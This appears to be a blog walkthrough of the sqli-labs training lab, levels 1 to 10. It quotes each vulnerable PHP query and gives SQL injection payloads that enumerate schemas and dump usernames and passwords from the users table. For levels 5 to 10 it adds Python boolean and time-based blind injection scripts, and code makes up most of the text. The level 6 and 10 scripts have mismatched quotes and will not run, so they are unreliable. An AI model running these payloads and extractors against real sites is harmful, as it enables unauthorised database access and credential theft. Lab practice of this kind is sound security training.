sql-labs

sql-lab

半夜无聊，玩一下sql-lab消遣一下~

less-1

• 注入类型: 字符型

触发代码段

​

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

查询所有的数据库

• group_concat()函数可以把多行结果合并成一行。

id=100' union select 1,group_concat(schema_name),3 from information_schema.schemata%23

查询当前数据库

• 使用database()函数。

id=100' union select 1,database(),3'%23

查询数据表

id=100' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

查询列明

id=100' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'%23

查询用户信息

id=100' union select 1,group_concat('<br/>',id,0x207e2a7e20,username,0x207e2a7e20,password),3 from `users`%23

less-2

整型注入

触发代码

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

查询用户信息

id=888 union select 1,group_concat('<br/>',id,0x207e2a7e20,username,0x207e2a7e20,password),3 from users

less-3

字符型多了括号

触发代码

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

payload

id=999')union select 1,group_concat('<br/>',id,0x207e2a7e20,username,0x207e2a7e20,password),3 from users%23

less-4

字符型

触发代码

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

因为被双引号分割了所以得绕过一哈。

payload

id=888")union select 1,group_concat('<br/>',id,0x7e,username,0x7e,password),3 from users%23

less-5

布尔盲注

触发代码段

if($row)
{
  		echo 'You are in...........';
}
else 
{
    print_r(mysql_error());
}

exp

#less-5 布尔盲注
import requests

url = "http://127.0.0.1/sqli-labs/less-5/?id=1' and "
result = ""
i = 0
while(True):
	head = 32
	tail = 127
	i+=1
	while(head<tail) : 
		mid = head + tail >> 1
		payload = " ord(substr( (select database()) ,%d,1))>%d %%23" %(i,mid)
		payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i,mid)
		
		r = requests.get(url+payload)
		if "You are in" in r.text:
			head = mid + 1
		else : 
			tail = mid
	if( head != 32):
		result += chr(head)
		print(result)
	else :
		break
print(result)

less-6

字符型，布尔型

使用php得双引号做字符型注入

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

exp

#less-6 布尔盲注
import requests

url = "http://127.0.0.1/sqli-labs/less-6/?id=1" and "
result = ""
i = 0
while(True):
	head = 32
	tail = 127
	i+=1
	while(head<tail) : 
		mid = head + tail >> 1
		payload = " ord(substr( (select database()) ,%d,1))>%d %%23" %(i,mid)
		payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i,mid)
		
		r = requests.get(url+payload)
		if "You are in" in r.text:
			head = mid + 1
		else : 
			tail = mid
	if( head != 32):
		result += chr(head)
		print(result)
	else :
		break
print(result)

less-7

字符，布尔型

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

exp

#less-7 布尔盲注
import requests

url = "http://127.0.0.1/sqli-labs/less-7/?id=1')) and "
result = ""
i = 0
while(True):
	head = 32
	tail = 127
	i+=1
	while(head<tail) : 
		mid = head + tail >> 1
		payload = " ord(substr( (select database()) ,%d,1))>%d %%23" %(i,mid)
		payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i,mid)
		
		r = requests.get(url+payload)
		if "You are in" in r.text:
			head = mid + 1
		else : 
			tail = mid
	if( head != 32):
		result += chr(head)
		print(result)
	else :
		break
print(result)

less-8

字符型，布尔盲注

代码

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

exp

#less-8 布尔盲注
import requests

url = "http://127.0.0.1/sqli-labs/less-8/?id=1' and "
result = ""
i = 0
while(True):
	head = 32
	tail = 127
	i+=1
	while(head<tail) : 
		mid = head + tail >> 1
		payload = " ord(substr( (select database()) ,%d,1))>%d %%23" %(i,mid)
		payload = " ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d %%23" % (i,mid)
		
		r = requests.get(url+payload)
		if "You are in" in r.text:
			head = mid + 1
		else : 
			tail = mid
	if( head != 32):
		result += chr(head)
		print(result)
	else :
		break
print(result)

less-9

时间盲注

触发代码端

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

无论是否查得到信息都写成了you are in

payload构造

需要调用sleep()函数进行延时。

exp

#less-9 时间盲注
import requests
import time
url = "http://127.0.0.1/sqli-labs/less-9/?id=1' and "
result = ""
i = 0
while(True):
	head = 32
	tail = 127
	i+=1
	while(head<tail) : 
		mid = head + tail >> 1
		payload = " if(ord(substr( (select database()) ,%d,1))>%d,sleep(0.6),2) %%23" %(i,mid)
		payload = " if(ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d,sleep(0.6),2) %%23" % (i,mid)
		start_time = time.time()
		r = requests.get(url+payload)
		end_time = time.time()
		if end_time - start_time > 0.6:
			head = mid + 1
		else : 
			tail = mid
	if( head != 32):
		result += chr(head)
		print(result)
	else :
		break
print(result)

less-10

时间注入

触发段

改成把双引号补上即可

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

exp

#less-10 时间盲注
import requests
import time
url = "http://127.0.0.1/sqli-labs/less-10/?id=1" and "
result = ""
i = 0
while(True):
	head = 32
	tail = 127
	i+=1
	while(head<tail) : 
		mid = head + tail >> 1
		payload = " if(ord(substr( (select database()) ,%d,1))>%d,sleep(0.6),2) %%23" %(i,mid)
		payload = " if(ord(substr( (select group_concat(id,0x7e,username,0x7e,password) from users) ,%d,1))>%d,sleep(0.6),2) %%23" % (i,mid)
		start_time = time.time()
		r = requests.get(url+payload)
		end_time = time.time()
		if end_time - start_time > 0.6:
			head = mid + 1
		else : 
			tail = mid
	if( head != 32):
		result += chr(head)
		print(result)
	else :
		break
print(result)